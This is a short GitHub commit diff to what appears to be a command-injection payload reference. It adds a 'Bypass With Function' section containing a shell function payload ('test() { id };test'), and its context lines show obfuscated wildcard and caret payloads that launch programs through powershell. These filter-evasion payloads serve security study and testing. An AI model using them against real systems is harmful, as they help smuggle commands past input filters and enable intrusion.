added new filter bypass

This commit is contained in:
Xhoenix 2025-07-17 18:40:50 +05:30 committed by GitHub
parent f0f71990ac
commit cd04db0ba3
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -26,6 +26,7 @@
* [Bypass With $()](#bypass-with--1)
* [Bypass With Variable Expansion](#bypass-with-variable-expansion)
* [Bypass With Wildcards](#bypass-with-wildcards)
* [Bypass With Function](#bypass-with-function)
* [Data Exfiltration](#data-exfiltration)
* [Time Based Data Exfiltration](#time-based-data-exfiltration)
* [Dns Based Data Exfiltration](#dns-based-data-exfiltration)
@ -351,6 +352,12 @@ powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```
### Bypass With Function
```powershell
test() { id };test
```
## Data Exfiltration
### Time Based Data Exfiltration